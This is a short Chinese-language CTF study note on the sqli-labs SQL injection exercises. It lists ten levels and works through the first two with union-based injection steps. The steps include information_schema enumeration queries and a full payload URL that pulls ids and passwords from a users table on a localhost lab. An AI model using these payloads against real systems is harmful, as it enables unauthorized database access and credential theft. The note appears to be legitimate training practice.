CTF
- SQL注入
-
- less1 GET - Error based - Single quotes - String
- less 2 GET - Error based - Intiger based
- less 3 GET - Error based - Single quotes with twist string
- less 4 GET - Error based - Double Quotes - String
- less 5 GET - Double Injection - Single Quotes - String
- less less 6 GET - Double Injection - Double Quotes - String
- less 7 GET - Dump into outfile - String
- less 8 GET - Blind - Boolian Based - Single Quotes
- less 9 GET - Blind - Time based. - Single Quotes
- less 10 GET - Blind - Time based - double quotes
SQL注入
从2021年3月20日开始做buuoj,解决sql注入问题。
less1 GET - Error based - Single quotes - String
思路:
1,使用字符‘进行判断,看是否有报错。
2,猜测列行,’ 后面加 union select 1,2,3#探测行数,并注意观察回显位置。可以对字符做url编码
3,使用union select 1,(select group_concat(table_name) from information_schema.tables),3# 查询出所有表名
4,使用union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = ‘想要的表名’),3# 查询出所有需要表的列名,然后再找出flag
http://localhost/sqli-labs/Less-1/?id=-1’ or 1=1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from users limit 1,1 --+
less 2 GET - Error based - Intiger based
1,使用字符‘进行判断,看是否有报错。
2,猜测列行,’ 后面加 union select 1,2,3#探测行数,并注意观察回显位置。可以对字符做url编码。但此时仍然报错,尝试使用不存在的id读数据,在后面使用union select,发现回显,可以用。
3,使用union select 1,(select group_concat(table_name) from information_schema.tables),3# 查询出所有表名
4,使用union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = ‘想要的表名’),3# 查询出所有需要表的列名,然后再找出flag
http://localhost/sqli-labs/Less-1/?id=-1’ or 1=1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from users limit 1,1 --+